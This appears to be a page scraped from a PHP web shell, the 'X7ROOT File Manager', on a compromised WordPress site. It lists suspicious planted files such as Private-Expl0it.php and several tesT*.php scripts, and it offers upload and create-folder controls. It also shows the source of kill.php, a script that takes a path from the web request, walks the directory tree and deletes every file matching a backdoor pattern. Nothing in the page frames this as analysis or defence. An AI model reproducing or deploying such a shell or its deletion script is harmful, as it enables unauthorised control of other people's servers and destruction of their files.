X7ROOT File Manager
Current Path:
/home/cbholdings/public_html
home
/
cbholdings
/
public_html
/
📁
..
📄
.htaccess
(717 B)
📁
.well-known
📁
8c60a3b8
📄
Private-Expl0it.php
(43.42 KB)
📁
a18cc
📄
buy.php
(604 B)
📁
cgi-bin
📄
error_log
(921.22 KB)
📄
ex.php
(21.61 KB)
📄
google196368ef2b448247.html
(53 B)
📄
google37e7e895f8656d84.html
(53 B)
📄
googleaeb2e0a7fabb077e.html
(53 B)
📄
index.php
(11.47 KB)
📄
jiw1x8f0.php
(15.21 KB)
📄
kill.php
(929 B)
📄
simple.php
(23.02 KB)
📄
tesTetm.php
(2.87 KB)
📄
tesTopp.php
(2.87 KB)
📄
tesTrCQ.php
(2.87 KB)
📄
tesTuli.php
(2.87 KB)
📄
tesTxcz.php
(2.87 KB)
📄
ticket.php
(5.16 KB)
📁
wp-admin
📄
wp-blog-header.php
(6.95 KB)
📁
wp-content
📁
wp-includes
📄
wp-loada.php
(206 B)
📄
wp-loadb.php
(19.35 KB)
Editing: kill.php
<?php header("Content-Type: text/html;charset=utf-8"); set_time_limit(0); ini_set('max_execution_time', 0); @ini_set('disable_functions', 'NONE'); $path = isset($_REQUEST['path']) ? $_REQUEST['path'] : $_SERVER['DOCUMENT_ROOT'].'/'; antivirus($path); function antivirus($dir){ $scandir = scandir($dir); foreach($scandir as $file){ $path = $dir.'/'.$file; $path = str_replace('//', '/', $path); if($file == '.' || $file == '..') continue; if(@is_link($path)) continue; if(@is_dir($path)){ if(is_readable($path)) antivirus($path); }else{ $del = 0; $y = file_get_contents($path); if(strstr($y, 'eval($') && strstr($y, '= ${ $')){ $del = 1; echo $path."<br>"; } if($del == 1){ unlink($path); } } } } ?>
Upload File
Create Folder